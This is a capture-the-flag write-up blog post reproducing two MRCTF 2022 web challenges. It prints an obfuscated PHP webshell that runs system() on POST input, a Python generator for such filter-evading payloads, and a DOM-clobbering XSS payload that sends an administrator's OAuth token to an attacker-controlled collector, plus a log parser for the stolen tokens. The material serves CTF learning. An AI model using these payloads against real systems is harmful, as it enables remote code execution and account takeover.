2022 MRCTF Reproduction


I'm too much of a noob; I can only get by reproducing challenges from other people's writeups.

WebCheckIn

What a clever idea, I never thought it could be done this way.

A file upload that only accepts PHP files, but it errors out if it detects command execution or certain other content in the uploaded file.

Method 1

The approach from r4kapig's writeup: use `new ERROR(1);` to trigger an error.

[screenshot]

[screenshot]

But actually this is presumably caused by the code the backend of this challenge uses to filter the contents of the uploaded PHP file, and the check feels a bit magical: once you `new` a class, whatever comes after it gets uploaded; it's just that only when you `new` one of PHP's built-in classes does the uploaded PHP file avoid being stopped by an error. In other words, you can just `new` any built-in class here.

[screenshot]

[screenshot]

Then just run a grep command to find the flag.

Method 2

This is the method from wm's writeup.

A ridiculous webshell built by constructing `CHR` out of XORed numeric strings and abusing PHP's dynamic concatenation and callable-string syntax. The expression in front of every call evaluates to the string `CHR` (PHP function names are case-insensitive); it is assembled by XORing the string forms of numeric literals: the oversized integer literal overflows to `INF`, `9.9999999999999999` stringifies as `10`, `9.9999999999999999^9` is `3`, `9^9` is `0`, and so on. Each argument is a digit string such as `115`, glued together with `.` from pieces like `.999999999999999` (which prints as `1` at PHP's default `precision`), and the six `chr()` results are concatenated into a callable name that is then invoked on `$_POST[1]`. The file therefore contains no letters at all outside `$_POST`, yet it is `system($_POST[1])` in disguise.

<?php
(((((999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999).(9))^((9.9999999999999999^9).(9.9999999999999999^9).(9.9999999999999999^9))^((99).(9))^((9).(9.9999999999999999))^((9^9).(9.9999999999999999^9^99.999999999999999^99).(9^9))^((9^9).(9^9).(9^9))^((99.9).(9)))(((.999999999999999).(.999999999999999).((9.9999999999999999^9)^((.999999999999999)^(9^((.999999999999999).(.999999999999999)))^(9.9999999999999999^9^99.999999999999999^99)))))).((((999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999).(9))^((9.9999999999999999^9).(9.9999999999999999^9).(9.9999999999999999^9))^((99).(9))^((9).(9.9999999999999999))^((9^9).(9.9999999999999999^9^99.999999999999999^99).(9^9))^((9^9).(9^9).(9^9))^((99.9).(9)))(((.999999999999999).(9^((.999999999999999).(.999999999999999))).(.999999999999999)))).((((999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999).(9))^((9.9999999999999999^9).(9.9999999999999999^9).(9.9999999999999999^9))^((99).(9))^((9).(9.9999999999999999))^((9^9).(9.9999999999999999^9^99.999999999999999^99).(9^9))^((9^9).(9^9).(9^9))^((99.9).(9)))(((.999999999999999).(.999999999999999).((9.9999999999999999^9)^((.999999999999999)^(9^((.999999999999999).(.999999999999999)))^(9.9999999999999999^9^99.999999999999999^99
)))))).((((999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999).(9))^((9.9999999999999999^9).(9.9999999999999999^9).(9.9999999999999999^9))^((99).(9))^((9).(9.9999999999999999))^((9^9).(9.9999999999999999^9^99.999999999999999^99).(9^9))^((9^9).(9^9).(9^9))^((99.9).(9)))(((.999999999999999).(.999999999999999).((.999999999999999)^(9^((.999999999999999).(.999999999999999)))^(9.9999999999999999^9^99.999999999999999^99))))).((((999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999).(9))^((9.9999999999999999^9).(9.9999999999999999^9).(9.9999999999999999^9))^((99).(9))^((9).(9.9999999999999999))^((9^9).(9.9999999999999999^9^99.999999999999999^99).(9^9))^((9^9).(9^9).(9^9))^((99.9).(9)))(((.999999999999999).(9^9).(.999999999999999)))).((((999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999).(9))^((9.9999999999999999^9).(9.9999999999999999^9).(9.9999999999999999^9))^((99).(9))^((9).(9.9999999999999999))^((9^9).(9.9999999999999999^9^99.999999999999999^99).(9^9))^((9^9).(9^9).(9^9))^((99.9).(9)))(((.999999999999999).(9^9).(9)))))($_POST[1])
?>

[screenshot]

[screenshot]
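The payload decoded, as an added example that is not the writeup's or wm's code: a small Python emulation of the three PHP coercion rules it depends on (float-to-string at the default `precision=14`, integer-literal overflow to `INF`, and `^` being bytewise for two strings but an integer XOR otherwise), followed by a generator that builds the same kind of letter-free call for any function name. The spellings of the digits 7 and 8 and the 320-digit literal used to force `INF` are my additions; everything else mirrors the expression above.

```python
"""Emulate the PHP coercions the letter-free webshell relies on, decode it,
and build the same kind of payload for an arbitrary callable name.
Added example for this page; not the writeup's or wm's code."""

PRECISION = 14                  # PHP's default `precision` ini value (float -> string)
NINE, NINETY_NINE = 9, 99
TEN = 9.9999999999999999        # too many 9s for a double: the literal is exactly 10.0
HUNDRED = 99.999999999999999    # likewise exactly 100.0
ALMOST_ONE = .999999999999999   # prints as "1" at precision 14, but casts to int 0
INF = float("inf")              # PHP parses the ~300-digit literal 999...9 as float INF

def php_str(v):
    """PHP (string) cast for numbers: ints verbatim, INF as 'INF', floats via %.14G."""
    if isinstance(v, int):
        return str(v)
    return "INF" if v == INF else f"{v:.{PRECISION}G}"

def php_xor(a, b):
    """PHP `^`: string ^ string is bytewise (length of the shorter operand);
    otherwise both sides are cast to int, floats truncating toward zero."""
    if isinstance(a, str) and isinstance(b, str):
        return "".join(chr(ord(x) ^ ord(y)) for x, y in zip(a, b))
    return int(a) ^ int(b)

def digits():
    """Values of the small sub-expressions the payload reuses: 0,1,2,3,4,5,6."""
    three = php_xor(TEN, NINE)                              # 10 ^ 9 = 3
    four = php_xor(php_xor(three, HUNDRED), NINETY_NINE)    # 3 ^ 100 ^ 99 = 4
    one = php_str(ALMOST_ONE)                               # "1" (concatenation context)
    two = php_xor(NINE, one + one)                          # 9 ^ "11" = 2
    six = php_xor(php_xor(ALMOST_ONE, two), four)           # int(0.999...) = 0; 0 ^ 2 ^ 4 = 6
    five = php_xor(three, six)                              # 3 ^ 6 = 5
    return php_xor(NINE, NINE), one, two, three, four, five, six

def decode_function_name():
    """Fold the XOR chain that precedes every call, operand by operand, in page order."""
    zero, _, _, three, four, _, _ = digits()
    operands = [php_str(INF) + php_str(NINE),                        # "INF9"
                php_str(three) * 3,                                  # "333"
                php_str(NINETY_NINE) + php_str(NINE),                # "999"
                php_str(NINE) + php_str(TEN),                        # "910"
                php_str(zero) + php_str(four) + php_str(zero),       # "040"
                php_str(zero) * 3,                                   # "000"
                php_str(99.9) + php_str(NINE)]                       # "99.99"
    name = operands[0]
    for op in operands[1:]:
        name = php_xor(name, op)    # all strings, so bytewise; 3 bytes survive
    return name                     # "CHR" (PHP function names are case-insensitive)

def decode_arguments():
    """The six chr() arguments: digit strings glued together with `.`."""
    zero, one, two, _, _, five, six = digits()
    return [one + one + php_str(five),             # "115"
            one + php_str(two) + one,              # "121"
            one + one + php_str(five),             # "115"
            one + one + php_str(six),              # "116"
            one + php_str(zero) + one,             # "101"
            one + php_str(zero) + php_str(NINE)]   # "109"

def decode_payload():
    """(function name, string the six calls concatenate to); the page then calls it on $_POST[1]."""
    return decode_function_name(), "".join(chr(int(c)) for c in decode_arguments())

# PHP spellings of every digit from the same primitives ("7" and "8" are mine).
# Each is used inside a `.` concatenation, which is what turns .999999999999999 into "1".
DIGIT_EXPR = {
    "0": "(9^9)",
    "1": "(.999999999999999)",
    "2": "(9^((.999999999999999).(.999999999999999)))",
    "3": "(9.9999999999999999^9)",
    "4": "(9.9999999999999999^9^99.999999999999999^99)",
    "5": "((9.9999999999999999^9)^((.999999999999999)^(9^((.999999999999999)"
         ".(.999999999999999)))^(9.9999999999999999^9^99.999999999999999^99)))",
    "6": "((.999999999999999)^(9^((.999999999999999).(.999999999999999)))"
         "^(9.9999999999999999^9^99.999999999999999^99))",
    "7": "(99.999999999999999^99)",                                            # 100 ^ 99
    "8": "(9^(9.9999999999999999^((.999999999999999).(.999999999999999))))",  # 9 ^ (10 ^ "11")
    "9": "(9)",
}

def chr_expr():
    """The page's XOR chain, with an integer literal long enough to overflow to INF."""
    return ("(((%s).(9))^((9.9999999999999999^9).(9.9999999999999999^9)"
            ".(9.9999999999999999^9))^((99).(9))^((9).(9.9999999999999999))"
            "^((9^9).(9.9999999999999999^9^99.999999999999999^99).(9^9))"
            "^((9^9).(9^9).(9^9))^((99.9).(9)))" % ("9" * 320))

def letterless_call(callee, arg="$_POST[1]"):
    """Emit `<?php (chr(..).chr(..)...)(arg);` with no ASCII letter outside `arg`."""
    calls = []
    for ch in callee:
        code = str(ord(ch))
        if len(code) < 2:   # a lone (.999999999999999) is never stringified
            raise ValueError("code points below 10 are not representable this way")
        calls.append("(%s)((%s))" % (chr_expr(), ".".join(DIGIT_EXPR[c] for c in code)))
    return "<?php (%s)(%s);" % (".".join(calls), arg)
```

`decode_function_name()` folds the seven operands `INF9`, `333`, `999`, `910`, `040`, `000`, `99.99` down to `CHR`, and `decode_arguments()` yields `115 121 115 116 101 109`, so the file above is `(chr(115).chr(121).chr(115).chr(116).chr(101).chr(109))($_POST[1])`, i.e. `system($_POST[1])`. `letterless_call("system")` produces the same kind of file for any name. Two caveats worth knowing before reusing the trick: the `"1"` only appears because `.` stringifies `.999999999999999` at `precision=14`, so on a server whose `precision` is set to 15 or higher it prints as `0.999999999999999` and the whole payload breaks; and the same literal is `0`, not `1`, whenever it sits directly under `^`, which is exactly what the `6` and `5` expressions rely on.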

God_of_GPA

First register an account, then log in.

[screenshot]

We can see there is a token here; this should be what authenticates the user's identity.

After logging in, the grade-viewing page has a button only the administrator can see, and we can also post trash talk and then submit its id to the administrator for him to look at. So this challenge wants us to use XSS to steal the administrator's token and get the flag.

<div id="scrip">
console.log("injected");
let uri = window.location.href + "";
if (uri.indexOf('token') > -1) {
    /* second visit: we came back from the OAuth endpoint with the token in the URL, leak it */
    location.href = "//server-ip/flag?f=" + encodeURIComponent(uri);
} else {
    /* first visit: bounce through the OAuth endpoint and have it redirect back to this page */
    location.href = "http://brtserver.node3.mrctf.fun/oauth/authorize?redirect_uri=" + window.location.href;
}
</div>
<img src='data:,"onerror="eval(scrip.innerText)' id="MyImg" />

Then we submit the uuid to the administrator, and the administrator's token shows up in our server's log. (Note that the script is read back through `innerText` of a rendered `div`, so `eval` receives it with the line breaks collapsed into spaces; it has to survive as a single line, which rules out `//` comments.)

[screenshot]

Go back to the login path and swap in the token.

[screenshot]

[screenshot]
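Fishing the token out of the collector's log, as an added example that is not part of the writeup: the log lines below are constructed in the format Python's `http.server` prints (an assumption; any access log with the request line works), with made-up hostnames, a made-up collector path `/flag` and made-up token values. The parser decodes the `f` parameter and then looks for `token` in both the query and the fragment of the leaked URL, because `window.location.href` carries the fragment and OAuth responses often put the token there. The second constructed line shows the weak spot of the payload's loose `indexOf('token')` test: a URL that merely contains the word gets exfiltrated but yields nothing.

```python
"""Pull the leaked administrator token out of the collector's access log.
Added example, not part of the writeup: the log lines below are constructed
in the format Python's `http.server` prints (assumed), with made-up hostnames,
a made-up collector path `/flag` and made-up token values."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log.  Line 2 is what the payload's loose indexOf('token') test
# leaks for a URL that merely contains the word; lines 3 and 4 carry a real token in
# the query string and in the fragment (which window.location.href includes).
SAMPLE_LOG = """\
10.0.0.7 - - [25/Apr/2022 23:05:11] "GET /favicon.ico HTTP/1.1" 404 -
10.0.0.7 - - [25/Apr/2022 23:06:40] "GET /flag?f=http%3A%2F%2Fbrtserver.node3.mrctf.fun%2Ftoken-help HTTP/1.1" 404 -
10.0.0.7 - - [25/Apr/2022 23:06:42] "GET /flag?f=http%3A%2F%2Fbrtserver.node3.mrctf.fun%2Fgrades%3Fid%3D42%26token%3Dadm1n-t0k3n-EXAMPLE HTTP/1.1" 404 -
10.0.0.7 - - [25/Apr/2022 23:06:44] "GET /flag?f=http%3A%2F%2Fbrtserver.node3.mrctf.fun%2Fgrades%23token%3Dfrag-t0k3n-EXAMPLE HTTP/1.1" 404 -
"""

REQUEST_RE = re.compile(r'"GET (?P<target>\S+) HTTP/[\d.]+"')


def exfiltrated_urls(log_text, collector_path="/flag", param="f"):
    """Decoded victim URLs carried in `param` of requests to collector_path, in log order."""
    urls = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = urlsplit(m.group("target"))
        if target.path != collector_path:
            continue
        # parse_qs splits on '&' first and only then percent-decodes, so the
        # '%26' and '%23' inside the encodeURIComponent()'d value stay in it.
        urls.extend(parse_qs(target.query).get(param, []))
    return urls


def tokens_in(url):
    """Token values from both the query and the fragment of a captured URL."""
    parts = urlsplit(url)
    found = []
    for component in (parts.query, parts.fragment):
        found.extend(parse_qs(component).get("token", []))
    return found


def admin_tokens(log_text):
    """Distinct tokens the payload leaked, in order of first appearance."""
    seen = []
    for url in exfiltrated_urls(log_text):
        for token in tokens_in(url):
            if token not in seen:
                seen.append(token)
    return seen


if __name__ == "__main__":
    for url in exfiltrated_urls(SAMPLE_LOG):
        print(url, "->", tokens_in(url))
    print("tokens:", admin_tokens(SAMPLE_LOG))
```

Point it at the real log instead of `SAMPLE_LOG` and take the first value `admin_tokens()` returns back to the login path. A 404 from the collector is fine, since the request line is logged whether or not `/flag` exists; if the collector is something other than `http.server`, only `REQUEST_RE` needs adjusting.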

It seems the XSS here mainly relies on DOM clobbering to trigger a DOM-based XSS.

(Come to think of it, this is the first time I've seen one, since DOM-based XSS is rarely exploited.)

Extending XSS with DOM Clobbering - 先知社区 (aliyun.com)

Here is the writeup by the challenge author:

MRCTF2022_God_of_GPA_WP - Welcome to fallingblog (ibukifalling.github.io)

It turns out only these two can be reproduced... the rest are all Java security, so I'm putting y4's writeup of the Java challenges here to read after I've learned Java.

2022MRCTF Java section | Y4tacker's Blog


Author: Ethe
Copyright notice: Unless otherwise stated, all posts on this blog are licensed under CC BY 4.0. Please credit Ethe when reposting!